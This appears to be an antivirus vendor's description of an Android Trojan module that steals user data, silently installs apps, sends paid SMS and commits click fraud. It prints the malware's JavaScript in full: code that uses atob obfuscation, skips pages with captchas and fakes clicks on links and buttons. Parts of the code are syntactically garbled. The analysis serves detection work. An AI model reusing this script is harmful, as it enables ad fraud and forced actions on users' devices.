SHA1:
- SHA1: 1f0776e3cb408839a876cf9e35a5c21dcec060a9
Detecting Trojan software modules (SDK) for Android OS, which perform a variety of malicious activities. They are downloaded and launched by other Trojan SDKs, which criminals integrate into various software. Android.Click.173.origin is downloaded fromhttp://cdn.ads.go******.com/files/* server. The authors of these modules can be Trojan SDK Android.Gmobi developers.
The Android.Click.173.origin managing server is located at https://api.***mobi.com.
Android.Click.173.origin can execute the following actions:
- sending user information (including the location of the infected device if the application in which the module is embedded has appropriate credentials) to the server;
- silently downloading and installing the applications if the device is root-accessible or if the application in which the Trojan was embedded has permission for hidden installation (such application should be in the system partition);
- sending the broadcasting messages upon the server's command, opening windows, running the services specified in the commands (for example, to automatically launch the "installed applications");
- sending Send SMS messages to pay for various services;
- displaying ads;
- downloading web pages, specified by the server, through WebView and simulating user transitions to links using JavaScript scripts downloaded from the management server. For example, the following script has been downloaded from the server:
var json = {
"cmd" : "getHtml",
"id" : "5ad9d7ef4efd4c0828472720",
"no" : 2,
"ctr" : 30,
"info" : "0.00:0/0/0.00",
"capture" : false,
"close" : true
}
function http.get(u)
{
if (!link){
waitAndClose();
return;
}
json.link = link.outerHTML;
if (link.click) {
link.click();
console.log("json://" + JSON.stringify(json))
return;
}
waitAndClose();
}
function waitAndClose(){
setTimeout(function(){
console.log("json://" + JSON.stringify(json))
}, 1000 * 10);
}
var html = document && document.documentElement && document.documentElement.outerHTML
var htmllc = html.toLowerCase()
var closing = false
function waitAndClose(){
closing = true
console.log("json://" + JSON.stringify({
'cmd' : 'close',
'close' : true
}))
}
Expand
source
function getAllTagOf(tag, eachCallback){
var html = ""
var items = document.getElementsByTagName(tag);
if (items && items.length > 0){
for(var i = 0; i < items.length; i++){
if (eachCallback) eachCallback(items[i])
html += items[i].outerHTML
}
}
return html
}
var gcc = atob('d3d3Lmdvb2dsZS5jb20vcmVjYXB0Y2hh')
var cc = atob('Y2FwdGNoYQ==')
var ch = atob('Y29pbmhpdmU=')
if (!htmllc){
} else if (htmllc.indexOf(gcc) != -1){
forceClose()
} else if (htmllc.indexOf(ch) != -1){
forceClose()
} else {
process()
}
function process(){
var all = document.querySelectorAll('button,a,input')
var links = [];
var CTR = json.ctr || 50;
if (closing){
console.log('Closing')
} else if (all.length == 0 || all.length > 10){
json.stop = 'all.length = ' + all.length;
waitAndClose();
} else {
var rnd = new Date().valueOf() % 100;
if (rnd > CTR){
json.stop = 'CTR : ' + rnd + ' > ' + CTR ;
waitAndClose();
} else {
var stop = false;
for(var i = 0; i < all.length; i++){
var item = all[i]
if ('A' == item.tagName){
item._text = item.innerText
links.push(item)
} else if ('BUTTON' == item.tagName){
if (item.type && item.type.toLowerCase() == 'submit'){
item._text = item.value
links.push(item)
}
} else if ('INPUT' == item.tagName){
var type = item.type && item.type.toLowerCase();
if (type == 'checkbox'){
item.checked = true
} else if (type == 'submit'){
item._text = item.value
links.push(item)
} else if (type == 'button'){
item._text = item.value
links.push(item)
} else if (type == 'hidden'){
} else if (type == 'reset'){
} else {
if (item._ignore){
console.log('skip ' + item.outerHTML)
} else {
json.stop = item.outerHTML;
console.log('Stop :' + json.stop)
stop = true;
break;
}
}
}
}
if (stop || links.length == 0){
waitAndClose();
} else {
var timeout = new Date().valueOf() % 5 + 1;
var index = links.length == 1 ? 0 : (new Date().valueOf() % links.length)
json.action = {
index : index,
count : links.length,
tag : links[index].tagName,
text : links[index].innerText
}
console.log('Timeout : ' + timeout + " Index : " + index + "/" + links.length)
json.close = false;
setTimeout(function(){__click__(links[index])}, 1000 * timeout);
}
}
}
}
The Trojan interacts with JavaScript on the pages being downloaded using WebChromeClient.onConsoleMessage.
